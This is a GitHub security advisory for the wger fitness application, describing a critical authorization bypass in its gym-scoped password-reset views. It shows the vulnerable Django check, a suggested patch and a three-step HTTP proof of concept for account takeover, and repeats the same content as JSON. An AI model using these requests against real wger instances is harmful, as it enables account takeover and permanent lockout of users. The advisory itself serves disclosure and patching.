GHSA-MHC8-P3JX-84MM
Vulnerability from github – Published: 2026-05-06 19:50 – Updated: 2026-05-06 19:50Summary
The reset_user_password and gym_permissions_user_edit views in wger perform a gym-scope authorization check using Python object comparison (!=) that evaluates None != None as False, silently bypassing the guard when both the attacker and victim have no gym assignment (gym=None). A user with gym.manage_gym permission and gym=None can reset the password of any other gym=None user; the new plaintext password is returned verbatim in the HTML response body, enabling one-shot full account takeover. The victim's original password is invalidated, locking them out permanently.
Details
File: wger/gym/views/user.py
The authorization guard in reset_user_password (and the parallel check in gym_permissions_user_edit) uses Django ORM object comparison:
# VULNERABLE - wger/gym/views/user.py
if request.user.userprofile.gym != user.userprofile.gym:
return HttpResponseForbidden()
When both request.user.userprofile.gym and user.userprofile.gym are None (representing users with no gym assignment - the default for newly registered users before gym linking), Python evaluates None != None as False. The guard therefore passes without raising HttpResponseForbidden, and execution continues unconditionally to:
password = password_generator()
user.set_password(password)
user.save()
return render(request, 'user/trainer_login.html', {'password': password, ...})
The generated password is rendered verbatim in the response body.
Affected endpoints:
- GET /en/gym/user/<user_pk>/reset-user-password -> wger.gym.views.user.reset_user_password
- GET /en/gym/user/<user_pk>/edit -> wger.gym.views.user.gym_permissions_user_edit
Suggested patch:
--- a/wger/gym/views/user.py
+++ b/wger/gym/views/user.py
- if request.user.userprofile.gym != user.userprofile.gym:
- return HttpResponseForbidden()
+ trainer_gym_id = request.user.userprofile.gym_id # raw FK int
+ member_gym_id = user.userprofile.gym_id
+
+ if trainer_gym_id is None or trainer_gym_id != member_gym_id:
+ return HttpResponseForbidden()
The _id suffix accesses the raw integer foreign key, bypassing Python's object identity semantics. The explicit is None guard rejects unaffiliated trainers immediately, regardless of the victim's gym status. Apply the same same_gym() helper pattern to all five views sharing this check: reset_user_password, gym_permissions_user_edit, admin_notes_list, documents_list, contracts_list.
PoC
Tested on wger/server:latest Docker image (runtime: Django 5.2.13). Two test users: trainer1 (gym.manage_gym permission, userprofile.gym=None) and alice (regular user, userprofile.gym=None).
Step 1 - Authenticate as trainer with manage_gym permission and gym=None:
POST /en/user/login HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
username=trainer1&password=[REDACTED]&csrfmiddlewaretoken=[REDACTED]
-> 302 Found; Set-Cookie: sessionid=[trainer1_session]
Step 2 - Trigger cross-tenant password reset:
GET /en/gym/user/2/reset-user-password HTTP/1.1
Host: target
Cookie: sessionid=[trainer1_session]
-> 200 OK
<tr><th>Password</th><td>[GENERATED_PLAINTEXT_PASSWORD]</td></tr>
Step 3 - Authenticate as victim (alice) using leaked password:
POST /en/user/login HTTP/1.1
Host: target
username=alice&password=[GENERATED_PLAINTEXT_PASSWORD]&csrfmiddlewaretoken=[...]
-> 302 Found; authenticated as alice
(alice's ORIGINAL password is now invalid - permanent lockout)
RBAC Disproof Protocol (three-scenario test):
- Scenario A (admin, same-gym) -> HTTP 200 (expected - documented feature)
- Scenario B (trainer1 gym=None -> alice gym=None) -> HTTP 200 with plaintext password in body (expected HTTP 403)
- Scenario C (trainer1 gym=1 -> alice gym=2) -> HTTP 403 (expected - guard works when gyms differ, confirms bypass is None-specific)
Reproducibility: 2/2 runs after clean-baseline database reset.
Impact
An attacker with gym.manage_gym permission and gym=None can:
- Reset the password of any other
gym=Noneuser on the wger instance. - Receive the new plaintext password in the HTTP response body.
- Log in as the victim immediately.
- Permanently lock the victim out (original password invalidated).
Affected deployments: every wger instance where gym.manage_gym permission is delegated to non-admin users AND any other users exist with gym=None. The gym=None state is the default for newly registered users before manual gym assignment, so every public-registration wger instance is affected.
Severity: Critical (CVSS 9.9). Network-reachable, low complexity, requires only low privilege (delegated trainer), scope change (impersonation of other tenant), complete confidentiality/integrity/availability loss for all unaffiliated accounts.
This is the same structural bug class as the sibling finding affecting trainer_login (submitted separately). The root cause - Django ORM object-!= returning False when both sides are None - appears across five views and warrants a shared same_gym() helper.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.5"
},
"package": {
"ecosystem": "PyPI",
"name": "wger"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-43948"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T19:50:31Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\n\nThe `reset_user_password` and `gym_permissions_user_edit` views in wger perform a gym-scope authorization check using Python object comparison (`!=`) that evaluates `None != None` as `False`, silently bypassing the guard when both the attacker and victim have no gym assignment (`gym=None`). A user with `gym.manage_gym` permission and `gym=None` can reset the password of **any other `gym=None` user**; the new plaintext password is returned verbatim in the HTML response body, enabling one-shot full account takeover. The victim\u0027s original password is invalidated, locking them out permanently.\n\n### Details\n\n**File**: `wger/gym/views/user.py`\n\nThe authorization guard in `reset_user_password` (and the parallel check in `gym_permissions_user_edit`) uses Django ORM object comparison:\n\n```python\n# VULNERABLE - wger/gym/views/user.py\nif request.user.userprofile.gym != user.userprofile.gym:\n return HttpResponseForbidden()\n```\n\nWhen both `request.user.userprofile.gym` and `user.userprofile.gym` are `None` (representing users with no gym assignment - the default for newly registered users before gym linking), Python evaluates `None != None` as `False`. The guard therefore passes without raising `HttpResponseForbidden`, and execution continues unconditionally to:\n\n```python\npassword = password_generator()\nuser.set_password(password)\nuser.save()\nreturn render(request, \u0027user/trainer_login.html\u0027, {\u0027password\u0027: password, ...})\n```\n\nThe generated password is rendered verbatim in the response body.\n\n**Affected endpoints**:\n- `GET /en/gym/user/\u003cuser_pk\u003e/reset-user-password` -\u003e `wger.gym.views.user.reset_user_password`\n- `GET /en/gym/user/\u003cuser_pk\u003e/edit` -\u003e `wger.gym.views.user.gym_permissions_user_edit`\n\n**Suggested patch**:\n\n```diff\n--- a/wger/gym/views/user.py\n+++ b/wger/gym/views/user.py\n- if request.user.userprofile.gym != user.userprofile.gym:\n- return HttpResponseForbidden()\n+ trainer_gym_id = request.user.userprofile.gym_id # raw FK int\n+ member_gym_id = user.userprofile.gym_id\n+\n+ if trainer_gym_id is None or trainer_gym_id != member_gym_id:\n+ return HttpResponseForbidden()\n```\n\nThe `_id` suffix accesses the raw integer foreign key, bypassing Python\u0027s object identity semantics. The explicit `is None` guard rejects unaffiliated trainers immediately, regardless of the victim\u0027s gym status. Apply the same `same_gym()` helper pattern to all five views sharing this check: `reset_user_password`, `gym_permissions_user_edit`, `admin_notes_list`, `documents_list`, `contracts_list`.\n\n### PoC\n\nTested on `wger/server:latest` Docker image (runtime: Django 5.2.13). Two test users: `trainer1` (`gym.manage_gym` permission, `userprofile.gym=None`) and `alice` (regular user, `userprofile.gym=None`).\n\n**Step 1** - Authenticate as trainer with `manage_gym` permission and `gym=None`:\n\n```\nPOST /en/user/login HTTP/1.1\nHost: target\nContent-Type: application/x-www-form-urlencoded\n\nusername=trainer1\u0026password=[REDACTED]\u0026csrfmiddlewaretoken=[REDACTED]\n\n-\u003e 302 Found; Set-Cookie: sessionid=[trainer1_session]\n```\n\n**Step 2** - Trigger cross-tenant password reset:\n\n```\nGET /en/gym/user/2/reset-user-password HTTP/1.1\nHost: target\nCookie: sessionid=[trainer1_session]\n\n-\u003e 200 OK\n\u003ctr\u003e\u003cth\u003ePassword\u003c/th\u003e\u003ctd\u003e[GENERATED_PLAINTEXT_PASSWORD]\u003c/td\u003e\u003c/tr\u003e\n```\n\n**Step 3** - Authenticate as victim (alice) using leaked password:\n\n```\nPOST /en/user/login HTTP/1.1\nHost: target\n\nusername=alice\u0026password=[GENERATED_PLAINTEXT_PASSWORD]\u0026csrfmiddlewaretoken=[...]\n\n-\u003e 302 Found; authenticated as alice\n(alice\u0027s ORIGINAL password is now invalid - permanent lockout)\n```\n\n**RBAC Disproof Protocol** (three-scenario test):\n- Scenario A (admin, same-gym) -\u003e HTTP 200 (expected - documented feature)\n- Scenario B (trainer1 gym=None -\u003e alice gym=None) -\u003e **HTTP 200 with plaintext password in body** (expected HTTP 403)\n- Scenario C (trainer1 gym=1 -\u003e alice gym=2) -\u003e HTTP 403 (expected - guard works when gyms differ, confirms bypass is `None`-specific)\n\nReproducibility: 2/2 runs after clean-baseline database reset.\n\n### Impact\n\nAn attacker with `gym.manage_gym` permission and `gym=None` can:\n\n1. Reset the password of any other `gym=None` user on the wger instance.\n2. Receive the new plaintext password in the HTTP response body.\n3. Log in as the victim immediately.\n4. Permanently lock the victim out (original password invalidated).\n\n**Affected deployments**: every wger instance where `gym.manage_gym` permission is delegated to non-admin users AND any other users exist with `gym=None`. The `gym=None` state is the **default for newly registered users** before manual gym assignment, so every public-registration wger instance is affected.\n\n**Severity**: Critical (CVSS 9.9). Network-reachable, low complexity, requires only low privilege (delegated trainer), scope change (impersonation of other tenant), complete confidentiality/integrity/availability loss for all unaffiliated accounts.\n\nThis is the same structural bug class as the sibling finding affecting `trainer_login` (submitted separately). The root cause - Django ORM object-`!=` returning `False` when both sides are `None` - appears across five views and warrants a shared `same_gym()` helper.",
"id": "GHSA-mhc8-p3jx-84mm",
"modified": "2026-05-06T19:50:31Z",
"published": "2026-05-06T19:50:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/wger-project/wger/security/advisories/GHSA-mhc8-p3jx-84mm"
},
{
"type": "PACKAGE",
"url": "https://github.com/wger-project/wger"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "wger: cross-tenant password reset and plaintext disclosure via gym=None bypass"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.